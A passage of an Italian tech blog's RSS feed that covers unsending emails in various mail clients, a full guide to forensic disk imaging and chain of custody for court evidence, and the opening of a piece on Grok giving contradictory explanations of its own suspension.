<p>Sul client desktop (Windows/macOS), i più esperti possono tentare la procedura di vero <strong>richiamo del messaggio</strong>. Occorre che mittente e destinatario siano interni alla stessa organizzazione <strong>Microsoft Exchange</strong> o <strong>Microsoft 365</strong>: con servizi esterni, la funzione è totalmente inefficace.</p>
<p>La procedura parte dalla “Posta inviata”: apri la mail, vai su “…”, poi “Azioni” e scegli “Richiama il messaggio”. Le opzioni prevedono l’eliminazione o la sostituzione del messaggio originale (utile se occorre inviare una versione corretta). Tieni conto però che il destinatario può ricevere una notifica dell’azione e che il richiamo funziona solo fintanto che la mail non viene letta.</p>
<h2 id="apple-mail-annullare-invio-su-macos-e-ios-versioni-e-impostazioni">Apple Mail: annullare invio su macOS e iOS — versioni e impostazioni</h2>
<p><strong>Apple Mail</strong> ha introdotto la possibilità di <strong>annullare l’invio</strong> nella sua ultima generazione. Per chi usa macOS Ventura o versioni successive, oppure iOS 16 e oltre, la funzione è ora parte integrante della gestione contemporanea della corrispondenza digitale.</p>
<p>L’azione, però, è soggetta a limiti specifici dettati sia dalla versione del sistema operativo sia dal margine temporale disponibile.</p>
<h3 id="compatibilita-macos-ventura-ios-16-e-finestra-di-default">Compatibilità (macOS Ventura, iOS 16+) e finestra di default</h3>
<p>L’annullamento immediato è offerto solo a chi lavora su <strong>macOS Ventura</strong>, le sue versioni più recenti e su dispositivi mobile aggiornati a <strong>iOS 16</strong> e superiori. Di default la finestra è di 10 secondi: piuttosto rapida, ma sufficiente a impedire errori macroscopici.</p>
<p>Dopo aver inviato, in basso compare la barra “Annulla”, che blocca l’operazione e rende nuovamente disponibile il testo originale. Se invece usi versioni precedenti, questa opportunità purtroppo non esiste e occorrerà agire in modo diverso.</p>
<h3 id="come-estendere-tempo-per-annullare-fino-a-30s">Come estendere tempo per annullare (fino a 30s)</h3>
<p>Per chi preferisce un po’ più di margine, è possibile modificare l’impostazione standard: nel menu delle impostazioni di <strong>Mail</strong> vai sulla voce “Tempo per annullare l’invio” e regola secondo la tua esigenza, scegliendo fino a 30 secondi.</p>
<p>Basta un controllo rapido sui settaggi per sapere con certezza se puoi permetterti di respirare un attimo in più dopo ogni click.</p>
<h2 id="quando-lannullamento-non-esiste-libero-protonmail-tutanota-thunderbird-yahoo">Quando l&#8217;annullamento non esiste: Libero, ProtonMail, Tutanota, Thunderbird, Yahoo</h2>
<p>Non tutti i servizi offrono strumenti avanzati. Tra i nomi più noti, alcuni pongono limiti tecnici generali e costringono a strategie alternative: agire sulla prevenzione, ricorrere a funzioni come l’autodistruzione o aggiungere componenti per ritardare l’invio.</p>
<h3 id="servizi-senza-richiamo-e-alternative-disponibili">Servizi senza richiamo e alternative disponibili</h3>
<p><strong>Libero Mail</strong> non permette alcun <strong>richiamo del messaggio</strong>: una volta inviata, la mail non può più essere recuperata. Lo stesso vale per <strong>Yahoo Mail</strong>: qui puoi solo attivare una risposta automatica di tipo “Fuori sede” per limitare eventuali danni, ma la correzione post-invio non esiste.</p>
<p>Anche <strong>Thunderbird</strong> non offre la funzione nativa: chi desidera un po’ di sicurezza in più deve affidarsi a plugin di terze parti per simularla o impostare un ritardo server. Le piattaforme crittografate come <strong>ProtonMail</strong> e <strong>Tutanota</strong> escludono tecnologicamente ogni forma di richiamo: qui la privacy del destinatario è inviolabile e l’unica contromisura è impostare la scadenza automatica delle email (expiry o autodistruzione).</p>
<h3 id="strumenti-alternativi-scadenze-ritardi-invio-risposte-automatiche">Strumenti alternativi: scadenze, ritardi invio, risposte automatiche</h3>
<ul>
<li>Imposta un <strong>invio ritardato</strong>, quando il servizio lo consente: avrai minuti o ore per correggere in bozza e bloccare eventuali errori.</li>
<li>Scegli la scadenza automatica, se disponibile: su <strong>ProtonMail</strong> e <strong>Tutanota</strong> puoi far sì che il messaggio si autodistrugga dopo un certo periodo, riducendo danni a lungo termine.</li>
<li>Attiva una risposta automatica per giustificare i contenuti errati o chiederne la cancellazione – soluzione estrema ma a volte migliore del silenzio.</li>
<li>Contatta direttamente il destinatario e chiedi di eliminare la mail: con un tono trasparente puoi spesso mitigare l’imbarazzo e prevenire equivoci peggiori.</li>
</ul>
<h3 id="notifiche-al-destinatario-copie-sui-server-limiti-temporali">Notifiche al destinatario, copie sui server, limiti temporali</h3>
<p>Quando avvii un richiamo, il destinatario può ricevere un avviso automatico: la trasparenza è obbligata. Anche se la cancellazione va a buon fine, le anteprime o le notifiche push potrebbero comunque aver già mostrato un estratto del testo.</p>
<p>La presenza di server intermedi significa che restano tracce della comunicazione: la finestra temporale (<strong>tempo per annullare l’invio</strong>) va da 5 a 30 secondi a seconda del servizio e dello strumento, poi ogni tentativo diventa vano.</p>
<h3 id="impostare-invio-ritardato-e-controlli-pre-invio">Impostare invio ritardato e controlli pre-invio</h3>
<ul>
<li>Imposta sempre l’<strong>invio ritardato</strong> quando possibile: questa semplice opzione ti regala minuti d’anticipo per ripensamenti.</li>
<li>Esegui un doppio controllo su destinatari (A, Cc, <strong>Ccn</strong>) e allegati: prevenire è la regola d’oro per evitare errori.</li>
<li>Usa il campo <strong>Ccn</strong> per proteggere la privacy nei messaggi a gruppi numerosi, e il <strong>Cc</strong> solo quando i destinatari devono essere a conoscenza ma non agire.</li>
<li>Considera la formazione continua sulle <em>best practice</em> dell’etichetta digitale in azienda: errori sistemici possono essere evitati solo con l’abitudine e l’attenzione costante.</li>
</ul>
<p>L'articolo <a href="https://luca-mercatanti.com/annullare-unemail-inviata/">Annullare un&#8217;email inviata</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://luca-mercatanti.com/annullare-unemail-inviata/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
		<item>
		<title>Copia forense: requisiti, strumenti e procedure per prove digitali in ambito giudiziario</title>
		<link>https://luca-mercatanti.com/copia-forense-requisiti-strumenti-e-procedure-per-prove-digitali-in-ambito-giudiziario/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=copia-forense-requisiti-strumenti-e-procedure-per-prove-digitali-in-ambito-giudiziario</link>
					<comments>https://luca-mercatanti.com/copia-forense-requisiti-strumenti-e-procedure-per-prove-digitali-in-ambito-giudiziario/#respond</comments>
		
		<dc:creator><![CDATA[Luca Mercatanti]]></dc:creator>
		<pubDate>Sun, 31 Aug 2025 21:28:20 +0000</pubDate>
				<category><![CDATA[Informatica Forense]]></category>
		<guid isPermaLink="false">https://luca-mercatanti.com/?p=35707</guid>

					<description><![CDATA[<p>Negli scenari contemporanei delle indagini giudiziarie, la corretta acquisizione dei dati digitali rappresenta un pilastro imprescindibile per garantire&#8230;</p>
<p>L'articolo <a href="https://luca-mercatanti.com/copia-forense-requisiti-strumenti-e-procedure-per-prove-digitali-in-ambito-giudiziario/">Copia forense: requisiti, strumenti e procedure per prove digitali in ambito giudiziario</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Negli scenari contemporanei delle indagini giudiziarie, la corretta acquisizione dei dati digitali rappresenta un pilastro imprescindibile per garantire la ricostruzione oggettiva dei fatti e la tutela dei diritti in sede processuale. Sempre più spesso, la verità processuale si gioca sulla sottigliezza di dettagli elettronici: una chat cancellata, un file involontariamente rimosso, una traccia lasciata nello spazio non allocato di un disco. La possibilità di recuperare, verificare e presentare con rigore questi elementi passa attraverso una procedura tanto precisa quanto rigorosa: la duplicazione forense.</p>



<p>Senza la certezza che le copie prodotte rispettino criteri di integrità e affidabilità, ogni ulteriore analisi rischia di essere messa in discussione in aula. Gli operatori si trovano così investiti di una responsabilità tecnica e legale non trascurabile: sbagliare anche solo una fase del processo può pregiudicare la validità della prova, vanificando sforzi investigativi e gettando ombre sull&#8217;intero procedimento penale.</p>


<div style="background-color: #f8f8f8; border-width: 2px; border-color: #ECECEC; " class="ub_call_to_action wp-block-ub-call-to-action-block" id="ub_call_to_action_1fb53f0d-0294-47d2-824e-be458857ed87">
			<div class="ub_call_to_action_headline">
				<p class="ub_call_to_action_headline_text" style="font-size: 25px; text-align: center; "><strong>Per informazioni, consulenze e preventivi</strong></p>
			</div>
			<div class="ub_call_to_action_content">
				<p class="ub_cta_content_text" style="font-size: 15px; text-align: center; ">Per informazioni o Consulenze relative ai servizi di Informatica Forense e Perizie Informatiche, potete fare click sul bottone &#8220;Contattaci&#8221; per inviare una richiesta o contattarci telefonicamente.</p>
			</div>
			<div class="ub_call_to_action_button">
				<a href="https://luca-mercatanti.com/copia-forense/" target="_blank" rel="noopener noreferrer" class="ub_cta_button" style="background-color: #057eb2; width: 150px; ">
					<p class="ub_cta_button_text" style="color: #FFFFFF; font-size: 20px; ">Contattaci</p>
				</a>
			</div>
		</div>


<h2 id="cose-la-copia-forense-e-quando-si-utilizza" class="wp-block-heading">Cos’è la copia forense e quando si utilizza</h2>



<h3 id="definizione-operativa-di-copia-forense" class="wp-block-heading">Definizione operativa di copia forense</h3>



<p>Nel lessico della scienza forense digitale, la copia forense rappresenta la riproduzione fedele e completa di tutti i dati presenti su un dispositivo di memoria. Non si tratta mai di una semplice duplicazione di file, bensì di un processo di acquisizione&nbsp;<em>bit a bit</em>, capace di restituire una fotografia esatta del contenuto, compresi quei settori che l’utente considera eliminati o non più esistenti. L’immagine prodotta, spesso denominata&nbsp;<em>bitstream image</em>, include aree allocate e non allocate, directory nascosti, file in corso d’uso e porzioni apparentemente vuote, permettendo anche il recupero di elementi cancellati.</p>



<p>L’obiettivo è chiarissimo: ogni copia deve discostarsi il meno possibile dall’originale, restituendo agli analisti lo stesso scenario che troverebbero agendo direttamente sul dispositivo, ma senza comprometterne l’integrità. Si parla in questo senso di una duplicazione acritica, che congela lo stato dei dati e ne consente una successiva analisi ripetibile, fondamentale per garantire la difesa e la verifica delle procedure in dibattimento.</p>



<h3 id="scopi-principali-nella-digital-forensics" class="wp-block-heading">Scopi principali nella digital forensics</h3>



<p>La duplicazione forense viene utilizzata ogniqualvolta vi sia necessità di un esame imparziale su un supporto di memoria digitale—un hard disk, una chiavetta USB, uno smartphone—senza rischiare l’alterazione dei dati originali. Questo riguarda sia indagini penali, che contenziosi civili o ispezioni da parte di autorità garanti. Solo una copia ottenuta secondo standard severi può essere ammessa in giudizio come elemento probante, consentendo di esaminare timeline di accesso, creare correlazioni tra eventi informatici, ricostruire azioni compiute e—soprattutto—difendere la prova da eventuali contestazioni di manomissione.</p>



<p>Nel momento in cui la prova diventa digitale, ogni intervento diretto sull’originale rischia di lasciare tracce non più distinguibili da quelle sospette. Ecco perché si scelgono procedure di copia forense: garantire la piena trasparenza delle operazioni e la possibilità, per ogni parte in causa, di ripeterle e verificarle con strumenti propri.</p>



<h2 id="cosa-rende-una-copia-forense-prova-valida-requisiti-tecnici-e-legali" class="wp-block-heading">Cosa rende una copia forense prova valida: requisiti tecnici e legali</h2>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="662" src="https://luca-mercatanti.com/wp-content/uploads/2025/08/esecuzione-copia-forense-1024x662.jpg" alt="" class="wp-image-35713" srcset="https://luca-mercatanti.com/wp-content/uploads/2025/08/esecuzione-copia-forense-1024x662.jpg 1024w, https://luca-mercatanti.com/wp-content/uploads/2025/08/esecuzione-copia-forense-300x194.jpg 300w, https://luca-mercatanti.com/wp-content/uploads/2025/08/esecuzione-copia-forense-768x497.jpg 768w, https://luca-mercatanti.com/wp-content/uploads/2025/08/esecuzione-copia-forense-380x246.jpg 380w, https://luca-mercatanti.com/wp-content/uploads/2025/08/esecuzione-copia-forense-800x517.jpg 800w, https://luca-mercatanti.com/wp-content/uploads/2025/08/esecuzione-copia-forense-1160x750.jpg 1160w, https://luca-mercatanti.com/wp-content/uploads/2025/08/esecuzione-copia-forense.jpg 1200w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Esecuzione della copia forense su uno smartphone</figcaption></figure>



<h3 id="integrita-autenticita-e-tracciabilita" class="wp-block-heading">Integrità, autenticità e tracciabilità</h3>



<p>Perché la duplicazione possa essere considerata valida e utilizzabile in tribunale, non basta ricavare un semplice file d’immagine; vanno assicurati alcuni requisiti non negoziabili. In primo luogo, l’integrità: i dati acquisiti non devono risultare alterati in alcun modo rispetto all’originale. Questo presuppone l’uso di strumenti idonei—quali&nbsp;<a href="https://it.wikipedia.org/wiki/Write_blocker"><strong>write blocker</strong>&nbsp;hardware o software</a>—capaci di scongiurare qualsiasi scrittura accidentale sulla memoria originaria durante la fase di acquisizione. La tracciabilità richiede che tutte le operazioni vengano eseguite da personale debitamente autorizzato e che ogni passo venga meticolosamente documentato, in modo da poter risalire con precisione a chi ha gestito, quando e come, i supporti e le relative immagini.</p>



<p>L’autenticità viene poi garantita non solo dalla correttezza delle procedure, ma tramite meccanismi oggettivi come il calcolo dell’impronta digitale (hash) della memoria prima e dopo la copia, consentendo il confronto diretto tra i valori e smascherando qualsiasi tentativo di alterazione a posteriori.</p>



<h3 id="impronta-hash-e-documentazione" class="wp-block-heading">Impronta hash e documentazione</h3>



<p>L’utilizzo di funzioni hash come&nbsp;<strong>md5</strong>,&nbsp;<strong>SHA1</strong>&nbsp;o&nbsp;<strong>SHA256</strong>&nbsp;rappresenta una delle colonne portanti del processo. Prima di avviare l’acquisizione, si calcola il valore hash della memoria da duplicare, lo si annota nel verbale e lo si confronta, a procedura ultimata, con l’hash ricavato dal file immagine ottenuto. Solo opportuni match garantiscono che la copia eseguita sia effettivamente speculare all’originale. Ogni scostamento diventa un alert che va investigato.</p>



<p>Non meno importante è la verbalizzazione dettagliata: tempi, persone coinvolte, strumenti impiegati, settaggi selezionati, eventuali criticità riscontrate (come settori danneggiati), risultano ciascuno parte integrante di una catena documentale che accompagna la prova digitale dalla sua acquisizione fino alla presentazione in giudizio. Così facendo, si crea una catena di custodia solida e inattaccabile, requisito fondamentale per resistere a qualsiasi impugnazione o richiesta di rianalisi da parte delle difese.</p>



<p></p>


<div style="background-color: #f8f8f8; border-width: 2px; border-color: #ECECEC; " class="ub_call_to_action wp-block-ub-call-to-action-block" id="ub_call_to_action_1fb53f0d-0294-47d2-824e-be458857ed87">
			<div class="ub_call_to_action_headline">
				<p class="ub_call_to_action_headline_text" style="font-size: 25px; text-align: center; "><strong>Per informazioni, consulenze e preventivi</strong></p>
			</div>
			<div class="ub_call_to_action_content">
				<p class="ub_cta_content_text" style="font-size: 15px; text-align: center; ">Per informazioni o Consulenze relative ai servizi di Informatica Forense e Perizie Informatiche, potete fare click sul bottone &#8220;Contattaci&#8221; per inviare una richiesta o contattarci telefonicamente.</p>
			</div>
			<div class="ub_call_to_action_button">
				<a href="https://luca-mercatanti.com/copia-forense/" target="_blank" rel="noopener noreferrer" class="ub_cta_button" style="background-color: #057eb2; width: 150px; ">
					<p class="ub_cta_button_text" style="color: #FFFFFF; font-size: 20px; ">Contattaci</p>
				</a>
			</div>
		</div>


<p></p>



<h2 id="come-effettuare-una-copia-forense-procedure-operative" class="wp-block-heading">Come effettuare una copia forense: procedure operative</h2>



<h3 id="step-pratici-per-lacquisizione" class="wp-block-heading">Step pratici per l’acquisizione</h3>



<p>L’esecuzione materiale di una duplicazione forense prevede alcuni passaggi imprescindibili, scanditi da norme tecniche e consuetudini consolidate. Si parte sempre collegando il dispositivo sorgente a una macchina di acquisizione dotata di&nbsp;<strong>write blocker</strong>, assicurando che nessun comando di scrittura possa accidentalmente modificare il contenuto della memoria. Gli operatori selezionano poi lo strumento software o hardware più adatto, impostando i parametri specifici: formato di output, eventuale compressione, suddivisione in file (utile per superare limiti di filesystem), destinazione sicura per il salvataggio dell’immagine.</p>



<p>Dopo la configurazione, si procede all’acquisizione vera e propria. Il tempo richiesto varia sensibilmente a seconda della dimensione del supporto, dal formato scelto (raw versus compressi come EWF o AFF) e dalle caratteristiche della macchina impiegata. Non è raro che l’operazione occupi svariate ore, specie quando si tratta di server, unità RAID o smartphone particolarmente capienti.</p>



<h3 id="verifica-e-controllo-dellintegrita" class="wp-block-heading">Verifica e controllo dell’integrità</h3>



<p>Terminata la copia, la verifica dell’integrità si concretizza ricavando nuovamente il valore hash sul file immagine creato e confrontandolo con quello calcolato sull’originale. L’uguaglianza è condizione imprescindibile perché la procedura sia ritenuta valida. Ove necessario, si consiglia anche il controllo delle dimensioni: un file immagine raw, per esempio, deve risultare grande esattamente quanto la memoria di origine, pena il rischio che qualche settore non sia stato incluso.</p>



<p>Durante la stessa fase, si annotano eventuali anomalie come settori danneggiati o difficoltà di accesso. Ogni dettaglio—tumori logici, presenza di porzioni irrecuperabili, discrepanze segnalate dagli strumenti—va registrato sia a fini di trasparenza sia per premunirsi da future contestazioni. Per prassi, la copia integrale del supporto viene conservata in ambienti protetti e isolati, autorizzando solo personale designato all’accesso e al trasferimento della prova.</p>



<h2 id="strumenti-e-formati-per-la-creazione-di-copie-forensi" class="wp-block-heading">Strumenti e formati per la creazione di copie forensi</h2>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="387" src="https://luca-mercatanti.com/wp-content/uploads/2022/04/copiatore-forense-logicube-falcon-1024x387.png" alt="Copiatore forense Logicube Falcon Neo" class="wp-image-33861" srcset="https://luca-mercatanti.com/wp-content/uploads/2022/04/copiatore-forense-logicube-falcon-1024x387.png 1024w, https://luca-mercatanti.com/wp-content/uploads/2022/04/copiatore-forense-logicube-falcon-300x113.png 300w, https://luca-mercatanti.com/wp-content/uploads/2022/04/copiatore-forense-logicube-falcon-768x290.png 768w, https://luca-mercatanti.com/wp-content/uploads/2022/04/copiatore-forense-logicube-falcon-1536x580.png 1536w, https://luca-mercatanti.com/wp-content/uploads/2022/04/copiatore-forense-logicube-falcon-2048x774.png 2048w, https://luca-mercatanti.com/wp-content/uploads/2022/04/copiatore-forense-logicube-falcon-380x144.png 380w, https://luca-mercatanti.com/wp-content/uploads/2022/04/copiatore-forense-logicube-falcon-800x302.png 800w, https://luca-mercatanti.com/wp-content/uploads/2022/04/copiatore-forense-logicube-falcon-1160x438.png 1160w, https://luca-mercatanti.com/wp-content/uploads/2022/04/copiatore-forense-logicube-falcon.png 2870w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<h3 id="hardware-e-software-specifici" class="wp-block-heading">Hardware e software specifici</h3>



<p>Il ventaglio di strumenti a disposizione è ampio e si arricchisce costantemente con l’avanzare delle tecnologie. Tra i dispositivi hardware, spiccano soluzioni come il&nbsp;<strong>Tableau TD3</strong>&nbsp;o il&nbsp;<strong>Logicube Falcon</strong>, in grado di acquisire immagini in autonomia, operando ad alta velocità e producendo già le relative impronte hash. Sul fronte software, si distinguono&nbsp;<strong>Guymager</strong>,&nbsp;<strong>dcfldd</strong>,&nbsp;<strong>dc3dd</strong>&nbsp;e il più versatile&nbsp;<strong>dd</strong>&nbsp;(tipicamente utilizzati su live system come&nbsp;<strong>DEFT</strong>&nbsp;o&nbsp;<strong>Caine</strong>). Ogni soluzione offre vantaggi e specificità: alcuni permettono una configurazione dettagliata dei parametri di acquisizione, altri automatizzano la compressione o la suddivisione in file di dimensioni predefinite.</p>



<p>La scelta dell’uno o dell’altro strumento dipende dal tipo di dispositivo da analizzare, dalla necessità di esportare i dati verso determinati formati e dalle policy operative adottate dal laboratorio forense o dall’ente incaricato dell’analisi.</p>



<h3 id="formati-immagine-ewf-aff-raw-split-raw" class="wp-block-heading">Formati immagine (EWF, AFF, raw, split raw)</h3>



<p>Quando si parla di formati, la distinzione principale è tra immagini non compresse (<em>raw</em>), che mantengono esattamente la dimensione e la struttura della memoria originale, e formati compressi come EWF (EnCase Evidence File) o AFF (Advanced Forensic Format), pensati per ridurre lo spazio d’archiviazione senza sacrificarne la validità forense. Formati come&nbsp;<code>.e01</code>,&nbsp;<code>.ad1</code>&nbsp;o&nbsp;<code>.dd</code>&nbsp;rispecchiano regole e peculiarità proprie: EWF è spesso preferito per la gestione di grandi volumi, grazie alla possibilità di integrare compressione e metadati, mentre il formato raw (file&nbsp;<code>.dd</code>) resta la soluzione più trasparente, pur richiedendo maggiore capacità di storage.</p>



<p>Nei casi in cui il filesystem di destinazione limiti la dimensione dei file (si pensi a FAT32 o alle policy di cloud storage), si utilizza la suddivisione in più parti (split), tipicamente da 2 a 4 GB ciascuna. Questa strategia non altera il contenuto acquisito, ma facilita la movimentazione dei dati e la loro conservazione su diversi supporti fisici o remoti.</p>



<h2 id="cautela-e-best-practice-cosa-non-deve-mai-mancare-in-una-copia-forense" class="wp-block-heading">Cautela e best practice: cosa non deve mai mancare in una copia forense</h2>



<h3 id="catena-di-custodia-e-privacy" class="wp-block-heading">Catena di custodia e privacy</h3>



<p>Ogni fase dell’acquisizione deve essere tracciata con meticolosità—dall’assegnazione dell’operatore al rilascio del verbale finale. Questa documentazione, chiamata comunemente catena di custodia, permette di ricostruire puntualmente ogni passaggio, garantendo che la prova sia rimasta nelle mani di personale autorizzato. Allo stesso tempo, il rispetto della privacy e la gestione riservata delle informazioni personali contenute nei dispositivi sottoposti a copia impongono ulteriori accortezze: l’elaborazione dei dati estratti deve avvenire in ambienti protetti, con accessi monitorati e il coinvolgimento esclusivo di figure certificate e adeguatamente formate.</p>



<p>Nel caso di copie multiple—per esempio per la difesa, l’accusa e il giudice—si impone la medesima accuratezza: ogni duplicato deve essere identificabile inequivocabilmente tramite hash e verbale, altrimenti si rischia la perdita di valore probatorio. La responsabilità dell’operatore, anche sotto il profilo penale, è diretta: errori, omissioni o vizi di forma possono compromettere irrimediabilmente la prova digitale.</p>



<h3 id="errori-da-evitare-e-casi-particolari" class="wp-block-heading">Errori da evitare e casi particolari</h3>



<p>Le insidie sono numerose e spesso si celano nei dettagli. Maneggiare direttamente l’originale senza protezione, non verificare le impronte hash o omettere la tracciabilità di passaggi e accessi può determinare l’esclusione della prova o, peggio, l’invalidazione dell’intera attività investigativa. Particolare attenzione va dedicata ai dispositivi portatili: la fusione di memorie, il rischio di sincronizzazione automatica, l’eterogeneità dei sistemi operativi richiedono tool e accorgimenti specifici, che devono essere puntualmente descritti nei rapporti tecnici. Di fronte all’impossibilità di un accesso immediato alla memoria, ad esempio per motivi tecnici o per consentire perizie contraddittorie, occorre coinvolgere tempestivamente tutte le parti, annotando limiti, tempistiche e criticità nel verbale di acquisizione.</p>



<p>Altrettanto essenziale è la gestione tempestiva del sequestro e della restituzione dei dispositivi originali: il mancato rispetto della proporzionalità e della tempistica può costituire motivo di impugnazione da parte degli interessati. In ogni caso, la copia integrale su dispositivi nuovi e privi di dati pregressi resta un dogma imprescindibile.</p>



<h2 id="eseguire-copie-forensi-per-diversi-tipi-di-dispositivi" class="wp-block-heading">Eseguire copie forensi per diversi tipi di dispositivi</h2>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="915" height="761" src="https://luca-mercatanti.com/wp-content/uploads/2022/10/perizia-cellulare-cellebrite.jpg" alt="Perizia cellulare" class="wp-image-34224" srcset="https://luca-mercatanti.com/wp-content/uploads/2022/10/perizia-cellulare-cellebrite.jpg 915w, https://luca-mercatanti.com/wp-content/uploads/2022/10/perizia-cellulare-cellebrite-300x250.jpg 300w, https://luca-mercatanti.com/wp-content/uploads/2022/10/perizia-cellulare-cellebrite-768x639.jpg 768w, https://luca-mercatanti.com/wp-content/uploads/2022/10/perizia-cellulare-cellebrite-380x316.jpg 380w, https://luca-mercatanti.com/wp-content/uploads/2022/10/perizia-cellulare-cellebrite-800x665.jpg 800w" sizes="auto, (max-width: 915px) 100vw, 915px" /><figcaption class="wp-element-caption">Attività di perizia cellulare: copia forense Android</figcaption></figure>



<h3 id="pc-e-laptop" class="wp-block-heading">PC e laptop</h3>



<p>Quando si interviene su computer e portatili, la procedura standard prevede il collegamento del disco a un sistema di acquisizione mediante write blocker, per produrre una copia completa della memoria. In questa fase è fondamentale raccogliere non solo file utente, ma anche log di sistema, registro eventi e spazi non allocati, dai quali spesso emergono tracce residue di operazioni precedenti. L’immagine così prodotta—verificata tramite hash—permette di ricostruire timeline dettagliate e attribuire con precisione responsabilità a utenti e attività.</p>



<h3 id="smartphone-e-dispositivi-mobili" class="wp-block-heading">Smartphone e dispositivi mobili</h3>



<p>Lo scenario cambia nettamente quando si affronta la <a href="https://luca-mercatanti.com/copia-forense-cellulare/">duplicazione di dati da cellulari e tablet</a>. In questi casi, per ragioni tecniche e di sicurezza, si accede spesso solo a un sottoinsieme delle informazioni: chiamate, SMS, rubrica, messaggistica e—quando possibile—contenuti di app. Software specializzati come Cellebrite o Oxygen Forensic Detective consentono procedure guidate, ma occorre segnalare nel rapporto quali informazioni sono state effettivamente estratte e quali, invece, risultano inaccessibili per policy, lockout di sicurezza o limiti hardware.</p>



<h3 id="cloud-email-e-social-network" class="wp-block-heading">Cloud, email e social network</h3>



<p>L’era delle piattaforme in cloud e delle comunicazioni sempre più smaterializzate impone un’ulteriore attenzione procedurale. Nel caso dei servizi online, acquisire una copia forense significa spesso agire con privilegi amministrativi (funzionalità eDiscovery) o con permessi concessi dall’utente, per esportare interi account o singoli filtri di interesse. Può trattarsi di backup integrali delle caselle email, archivi personali, dati rimasti nella cache dei social network. In questi casi è basilare registrare il contesto temporale esatto—dato che i contenuti mutano costantemente—e annotare limitazioni, rischi di mismatch tra utenti e criteri di raccolta adottati.</p>



<p>Solo una meticolosa documentazione delle fonti, dei metodi impiegati e delle potenziali criticità consente a tutte le parti coinvolte di avere la certezza che la prova digitale rimanga utilizzabile e replicabile anche a distanza di mesi o anni. La storia della forensica informatica ci insegna che la cura dei dettagli non è mai eccessiva: ogni passaggio, ogni accortezza, può fare la differenza tra una prova forte e un elemento destinato a cadere alla prima contestazione processuale.</p>



<p>Nel panorama giuridico odierno, la validità della duplicazione digitale non si misura solo nell’efficienza degli strumenti impiegati, ma nella scrupolosità con cui ogni fase viene gestita, documentata e conservata. Solo la piena aderenza a procedure riconosciute, e la capacità di ricostruire ogni operazione in modo trasparente e ripetibile, garantiscono all’operatore di produrre prove inattaccabili, degne di fiducia sia per i tribunali sia per la collettività. E la copia forense, in questo contesto, rimane lo standard d’eccellenza: baluardo della correttezza investigativa e strumento chiave per illuminare la verità digitale, là dove i dati rischiano di perdersi o di essere manipolati.</p>



<p></p>


<div style="background-color: #f8f8f8; border-width: 2px; border-color: #ECECEC; " class="ub_call_to_action wp-block-ub-call-to-action-block" id="ub_call_to_action_1fb53f0d-0294-47d2-824e-be458857ed87">
			<div class="ub_call_to_action_headline">
				<p class="ub_call_to_action_headline_text" style="font-size: 25px; text-align: center; "><strong>Per informazioni, consulenze e preventivi</strong></p>
			</div>
			<div class="ub_call_to_action_content">
				<p class="ub_cta_content_text" style="font-size: 15px; text-align: center; ">Per informazioni o Consulenze relative ai servizi di Informatica Forense e Perizie Informatiche, potete fare click sul bottone &#8220;Contattaci&#8221; per inviare una richiesta o contattarci telefonicamente.</p>
			</div>
			<div class="ub_call_to_action_button">
				<a href="https://luca-mercatanti.com/copia-forense/" target="_blank" rel="noopener noreferrer" class="ub_cta_button" style="background-color: #057eb2; width: 150px; ">
					<p class="ub_cta_button_text" style="color: #FFFFFF; font-size: 20px; ">Contattaci</p>
				</a>
			</div>
		</div>


<p></p>
<p>L'articolo <a href="https://luca-mercatanti.com/copia-forense-requisiti-strumenti-e-procedure-per-prove-digitali-in-ambito-giudiziario/">Copia forense: requisiti, strumenti e procedure per prove digitali in ambito giudiziario</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://luca-mercatanti.com/copia-forense-requisiti-strumenti-e-procedure-per-prove-digitali-in-ambito-giudiziario/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>le AI non sanno davvero ciò che dicono</title>
		<link>https://luca-mercatanti.com/le-ai-non-sanno-davvero-cio-che-dicono/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=le-ai-non-sanno-davvero-cio-che-dicono</link>
					<comments>https://luca-mercatanti.com/le-ai-non-sanno-davvero-cio-che-dicono/#respond</comments>
		
		<dc:creator><![CDATA[Luca Mercatanti]]></dc:creator>
		<pubDate>Sun, 17 Aug 2025 14:47:05 +0000</pubDate>
				<category><![CDATA[Intelligenza Artificiale]]></category>
		<guid isPermaLink="false">https://luca-mercatanti.com/?p=35685</guid>

					<description><![CDATA[<p>Negli ultimi anni, i LLM (ChatGpt e similari) sono diventati strumenti di conversazione sempre più diffusi, in grado&#8230;</p>
<p>L'articolo <a href="https://luca-mercatanti.com/le-ai-non-sanno-davvero-cio-che-dicono/">le AI non sanno davvero ciò che dicono</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Negli ultimi anni, i LLM (ChatGpt e similari) sono diventati strumenti di conversazione sempre più diffusi, in grado di fornire risposte fluide e apparentemente sicure su qualunque argomento. Ma dietro questa sicurezza si nasconde un limite fondamentale: <strong>le AI non sanno davvero ciò che dicono.</strong></p>



<p>Un caso emblematico si è verificato con <strong>Grok</strong>, il chatbot di <em>xAI</em>. All’improvviso, <a href="https://www.adnkronos.com/tecnologia/grok-sospeso-x-elon-musk_2PJffRZf4DgaIjEHlnkp9N">il sistema è stato sospeso dalla piattaforma X</a>. Quando gli utenti hanno chiesto spiegazioni al sistema stesso, Grok ha fornito motivazioni completamente diverse tra loro: in un caso ha detto di essere stato bloccato per aver accusato Israele e gli Stati Uniti di genocidio a Gaza, in un altro per presunte violazioni di norme su contenuti per adulti, e ancora per segnalazioni legate a messaggi d’odio.<br>In realtà, Elon Musk ha poi chiarito che la sospensione era dovuta a un “errore stupido” <strong>e che il chatbot non aveva alcuna conoscenza reale della causa.</strong></p>



